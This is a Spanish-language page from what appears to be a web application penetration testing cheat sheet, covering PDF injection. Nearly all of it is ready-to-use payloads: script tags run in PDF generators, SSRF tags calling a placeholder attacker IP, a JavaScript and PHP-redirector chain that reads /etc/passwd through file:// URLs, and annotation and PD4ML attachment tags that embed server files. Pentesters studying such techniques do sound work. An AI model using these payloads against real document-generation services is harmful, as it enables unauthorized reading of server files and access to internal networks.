馃煝
Web Application Penetration Testing
  • Inicio
  • General
    • Metodolog铆as y est谩ndares
    • Aplicaciones vulnerables
  • Reconocimiento y recolecci贸n de informaci贸n
    • Web Application Firewall (WAF)
    • Domain Name System (DNS)
    • Subdominios y Virtual Host (VHost)
    • SSL/TLS y algoritmos de cifrados
    • Certificados
    • Tecnolog铆as web
  • Escaneo y enumeraci贸n
    • HTTP security headers
    • HTTP methods (verbs)
    • Crawling y spidering
    • Fuzzing
      • Directorios
      • Archivos
      • Extensiones
      • Par谩metros
        • GET
        • POST
      • Wordlists
    • Compresi贸n y ofuscaci贸n
    • Herramientas automatizadas
  • Explotaci贸n
    • API keys
    • Clickjacking
    • HTTP methods (verbs)
    • Input data validation
    • HTTP Host header
    • Autenticaci贸n y autorizaci贸n
      • Cookie
      • JSON Web Token (JWT)
      • OAuth
      • SAML
    • Same-origin policy (SOP)
      • Cross-origin resource sharing (CORS)
    • Cross-site scripting (XSS)
    • Cross-site request forgery (CSRF)
    • File upload
    • Path traversal & file inclusion
    • Command injection
      • Node.js
    • SQL injection (SQLi)
      • MySQL / MariaDB
      • Microsoft SQL Server
      • PostgreSQL
      • Oracle
      • sqlmap
    • NoSQL injection (NoSQLi)
    • XML external entity (XXE) injection
    • CRLF injection
    • XPath injection
    • LDAP injection
    • PDF injection
    • Server-side template injection (SSTI)
    • Server-side include (SSI) injection
    • Server-side parameter pollution
    • Server-side request forgery (SSRF)
    • Web cache poisoning
    • HTTP request smuggling
    • Prototype pollution
    • Type juggling
    • GraphQL
    • Open redirect
    • Content Management System (CMS)
      • WordPress
    • Websocket
    • Deserialization
    • Flash
  • Revisi贸n de c贸digo
    • Java
  • Checklist
    • Web application penetration testing
    • Web API penetration testing
Con tecnolog铆a de GitBook
En esta p谩gina
  • Identificaci贸n de librer铆a de generaci贸n de PDF
  • JavaScript execution
  • Server-side request forgery (SSRF)
  • Local file inclusion (LFI)

驴Te fue 煤til?

  1. Explotaci贸n

PDF injection

Identificaci贸n de librer铆a de generaci贸n de PDF

exiftool file.pdf
pdfinfo file.pdf

JavaScript execution

<script>document.write('test')</script>
<script>document.write(window.location)</script>

Server-side request forgery (SSRF)

<img src="http://<attacker-IP-address>/test"/>
<link rel="stylesheet" href="http://<attacker-IP-address>/test"/>
<iframe src="http://<attacker-IP-address>/test"></iframe>
<iframe src="http://127.0.0.1:80/api/" width="800" height="400"></iframe>

Local file inclusion (LFI)

Con ejecuci贸n de JavaScript.

<script>
	function addNewLines(str) {
		var result = '';
		while (str.length > 0) {
		    result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewLines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Sin ejecuci贸n de JavaScript.

<iframe src="file:///etc/passwd" width="800" height="400"></iframe>
<object data="file:///etc/passwd" width="800" height="400">
<portal src="file:///etc/passwd" width="800" height="400">

Sin ejecuci贸n de JavaScript + SSRF.

redirector.php
<?php header('Location: file://' . $_GET['url']); ?>
<iframe src="http://<attacker-IP-address>/redirector.php?url=%2fetc%2fpasswd" width="800" height="400"></iframe>

Anotaciones y adjuntos.

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

# PD4ML
<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>
AnteriorLDAP injectionSiguienteServer-side template injection (SSTI)

脷ltima actualizaci贸n hace 9 meses

驴Te fue 煤til?